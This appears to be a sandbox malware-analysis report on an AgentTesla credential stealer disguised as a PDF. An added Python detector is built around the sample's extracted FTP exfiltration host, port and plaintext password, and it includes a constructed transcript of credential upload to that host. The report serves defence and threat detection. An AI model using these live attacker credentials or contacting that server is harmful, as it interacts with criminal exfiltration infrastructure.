General
Target: Ferrecsa D701163.pdf.exe
Size: 1.2MB
Sample: 240818-t3ng6awdpk
MD5: 861b8fa009a52d4a2a0484b8c2673fb3
SHA1: 379c013437d1f2956eb40772281754545a6ad124
SHA256: 655a38b1686aa4f75f6dd4f2b59c8e9e09cde9997b46bafbe4e3dee38d859c99
SHA512: 5d24eb0674278d40e26db482e06a301ccca675a1454593868929fde24def1dcc6431ecee123fa05ec2907c375d2220d8499e68d15be5343e4e2ace529a6776f8
SSDEEP: 24576:jiUmSB/o5d1ubcv7HAUJDeRSCJvYDxsHWaNL5ZUPNZjk9WtI5CtbXosz67:j/mU/ohubcv77qRNBSMNLgPNYWi5Ctzc
Behavioral task behavioral1
Sample: Ferrecsa D701163.pdf.exe
Resource: win7-20240705-en
Behavioral task behavioral2
Sample: Ferrecsa D701163.pdf.exe
Resource: win10v2004-20240802-en
Malware Config
Extracted
agenttesla
Protocol: ftp
Host: ftp://ftp.corpsa.net
Port: 21
Username: [email protected]
Password: HMcJs([wrG~1
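The extracted configuration above is the most actionable part of this report: the stealer exfiltrates over plaintext FTP with hard-coded credentials, so the host, port, username and password can be matched directly on the wire. The following is an added example, not code from the Triage report or from the malware author, showing how to parse the report's config block and run the resulting indicators over an FTP control-channel transcript. The host, port and password come from the report; the username is the obfuscated placeholder the page shows; the transcript lines, the `STOR` filename and the double-extension check on the target filename are constructed for the example.

```python
"""Added example: turn the AgentTesla FTP config from the Triage report into
detection checks. Config values are from the report; the FTP transcript is
constructed, not captured from the sample."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# The Malware Config block as the report prints it. "[email protected]" is the
# page's obfuscation placeholder, not the real username.
TRIAGE_CONFIG_TEXT = """\
Protocol: ftp- Host:
ftp://ftp.corpsa.net - Port:
21 - Username:
[email protected] - Password:
HMcJs([wrG~1
"""

KEYS = ("Protocol", "Host", "Port", "Username", "Password")


@dataclass(frozen=True)
class FtpConfig:
    protocol: str
    host: str      # bare hostname, scheme stripped
    port: int
    username: str
    password: str


def parse_triage_config(text: str) -> FtpConfig:
    """Parse Triage's 'Key: value - NextKey:' layout (keys may be split across lines)."""
    flat = " ".join(line.strip() for line in text.splitlines() if line.strip())
    key_alt = "|".join(KEYS)
    # A value runs until the next key (optionally preceded by a ' - ' separator) or end of text.
    pattern = re.compile(rf"({key_alt}):\s*(.*?)(?=\s*-?\s*(?:{key_alt}):|$)")
    fields = {m.group(1): m.group(2).strip() for m in pattern.finditer(flat)}
    missing = [k for k in KEYS if k not in fields]
    if missing:
        raise ValueError(f"config block missing fields: {missing}")
    host = fields["Host"]
    if "://" in host:
        host = urlparse(host).hostname or host
    return FtpConfig(fields["Protocol"], host, int(fields["Port"]),
                     fields["Username"], fields["Password"])


# Constructed plaintext FTP control-channel transcript (C: client, S: server).
SAMPLE_FTP_TRANSCRIPT = [
    "C: <connect ftp.corpsa.net:21>",
    "S: 220 FTP server ready",
    "C: USER [email protected]",
    "S: 331 Please specify the password.",
    "C: PASS HMcJs([wrG~1",
    "S: 230 Login successful.",
    "C: STOR stolen_credentials.html",   # constructed filename
    "S: 150 Ok to send data.",
]


def detect_ftp_exfil(transcript, cfg: FtpConfig):
    """Return findings for a session that reaches the extracted C2 with the extracted creds."""
    findings = []
    connected = False
    for line in transcript:
        m = re.match(r"C: <connect (\S+):(\d+)>", line)
        if m and m.group(1).lower() == cfg.host.lower() and int(m.group(2)) == cfg.port:
            connected = True
            findings.append(f"connection to AgentTesla C2 {cfg.host}:{cfg.port}")
        m = re.match(r"C: USER (.+)", line)
        if m and m.group(1) == cfg.username:
            findings.append("login with extracted username")
        m = re.match(r"C: PASS (.+)", line)
        if m and m.group(1) == cfg.password:
            findings.append("login with extracted password (sent in plaintext)")
        m = re.match(r"C: STOR (.+)", line)
        if m and connected:
            findings.append(f"file upload to C2: {m.group(1)}")
    return findings


DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}


def is_double_extension_lure(filename: str) -> bool:
    """True for names like 'x.pdf.exe' where a document extension masks an executable."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOC_EXTS and parts[2] in EXEC_EXTS


if __name__ == "__main__":
    cfg = parse_triage_config(TRIAGE_CONFIG_TEXT)
    for finding in detect_ftp_exfil(SAMPLE_FTP_TRANSCRIPT, cfg):
        print("[!]", finding)
    print("double-extension lure:", is_double_extension_lure("Ferrecsa D701163.pdf.exe"))
```

Because FTP sends `USER` and `PASS` in the clear, the same matching can be done in a network sensor on the control channel; the credentials are the stealer's own exfiltration account, so a hit on them is a high-confidence indicator of this sample family rather than of a victim's credentials.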
Targets
Target: Ferrecsa D701163.pdf.exe
Size: 1.2MB
AgentTesla
Agent Tesla is a remote access tool (RAT) and credential stealer written in Visual Basic .NET.
Credentials from Password Stores: Credentials from Web Browsers
Malicious access to, or copying of, a web browser credential store.
AutoIT Executable
AutoIt scripts compiled to PE executables.
Suspicious use of SetThreadContext
Setting another thread's context is characteristic of process hollowing and other code-injection techniques.